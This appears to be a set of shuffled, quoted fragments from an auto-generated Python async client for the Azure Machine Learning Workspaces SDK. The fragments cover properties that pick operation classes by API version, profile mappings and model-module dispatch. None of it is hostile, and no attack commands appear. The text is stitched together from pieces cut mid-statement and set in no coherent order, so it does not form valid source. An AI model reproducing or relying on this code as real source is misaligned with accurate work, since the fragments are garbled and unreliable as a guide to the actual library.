self._get_api_version('online_endpoints') if api_version == '2021-10-01': from", "Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else:", ":class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations", "\"\"\" api_version = self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as", "raise ValueError(\"API version {} does not have operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config,", "{} does not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'environment_versions'\".format(api_version))", "ValueError(\"API version {} does not have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "else: raise ValueError(\"API version {} does not have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client,", "have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance", "2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01':", "\"\"\" api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version ==", "not have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self):", "self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version", "* 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations", "API version. The api-version parameter sets the default API version if the operation", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version", "**kwargs): \"\"\"This is a fake class to support current implemetation of MultiApiClientMixin.\" Will", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "'2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version ==", "{} does not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from", "is not described in the profile. :param credential: Credential needed for the client", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise", "ValueError(\"API version {} does not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", ":class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from", "..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise ValueError(\"API version {} does not have", "self._get_api_version('get_operation_status') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: raise", "return models elif api_version == '1.0.0': from ..model_dataplane import models return models elif", "version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version =", ":class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version", "from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "@property def runs(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\"", ":class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version == '2021-10-01': from", "contains multiple API versions, to help you deal with all of the Azure", ":class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations", "api-version and/or profile. The profile sets a mapping between an operation group and", "== '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version {}", "'1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0',", "\"\"\"This is a fake class to support current implemetation of MultiApiClientMixin.\" Will be", "raise ValueError(\"API version {} does not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config,", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'online_deployments'\".format(api_version)) return", "str :param base_url: Service URL :type base_url: str :param profile: A profile definition,", "self._client.close() async def __aenter__(self): await self._client.__aenter__() return self async def __aexit__(self, *exc_details): await", "'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans':", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version ==", "2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if", "base_url: str :param profile: A profile definition, from KnownProfiles to dict. :type profile:", "subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod", ":class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version", "import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on the API version: * v1.0:", "{} does not have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", ":class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version ==", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_endpoints'\".format(api_version)) return", "on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>`", "the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` *", "@property def data_versions(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` *", "\"\"\"Instance depends on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets')", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'environment_containers'\".format(api_version))", "@property def private_endpoint_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` *", "..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations", "from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise ValueError(\"API version {} does not", "..runhistory.aio.operations import RunOperations as OperationClass else: raise ValueError(\"API version {} does not have", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'experiments'\".format(api_version)) return", "ValueError(\"API version {} does not have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "URL :type base_url: str :param profile: A profile definition, from KnownProfiles to dict.", "is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG:", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API", "default API version if the operation group is not described in the profile.", "== '2022-05-01': from ..v2022_05_01 import models return models raise ValueError(\"API version {} is", "version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version == '1.5.0': from", "api_version == 'v1.0': from ..runhistory import models return models elif api_version == '2020-09-01-dataplanepreview':", "in profile. :type api_version: str :param base_url: Service URL :type base_url: str :param", "v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on", "not have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self):", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on the API version: * v1.0:", "on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>`", "import ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as", "and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from", "2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on the API", "'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \"", "2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if", "Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>`", "'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on the", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on the API version:", "* v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` *", "to help you deal with all of the Azure clouds (Azure Stack, Azure", "does not have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass", "Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>`", "{} is not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on the API version:", "..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations", "* 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers')", "operate on Azure Machine Learning Workspace resources. This ready contains multiple API versions,", "on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version", "v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations import", "the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions')", "raise ValueError(\"API version {} does not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config,", "== '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise ValueError(\"API version {}", "Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will", "'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on the", "on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>`", "..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "DatasetContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'get_operation_status'\".format(api_version))", "VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance", "\"\"\"Instance depends on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models')", "depends on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview:", "DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION,", "import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise", "raise ValueError(\"API version {} does not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config,", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on the API version: *", "2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "to connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the", "the default API version if the operation group is not described in the", "raise ValueError(\"API version {} does not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config,", "def compute(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview:", "\"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None:", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from", "depends on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01:", "def batch_job_deployment(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version", "def run(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version", "import DataContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'online_endpoints'\".format(api_version))", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01': from", "2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version == '2021-10-01':", "= self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass elif", "import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` *", "all of the Azure clouds (Azure Stack, Azure Government, Azure China, etc.). By", "Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>`", "version {} does not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "* 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "async_operations(self): \"\"\"Instance depends on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version =", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on the API version:", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'datastores'\".format(api_version))", "== '2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass elif api_version == '2022-01-01-preview': from", "group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on", "api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return models elif api_version ==", "* 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version ==", "..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations", "== '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version {}", "'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on the", "= \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0',", "= self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif", "dataset_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version =", "group is not described in the profile. :param credential: Credential needed for the", ":mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise ValueError(\"API version", "import JobsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview':", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version == '2022-02-01-preview':", "import ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as", "group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on", "def component_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview:", "have operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance", "'2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise ValueError(\"API version {} does", "ValueError(\"API version {} does not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "version {} does not have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "def online_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview:", "does not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "model_containers(self): \"\"\"Instance depends on the API version: * 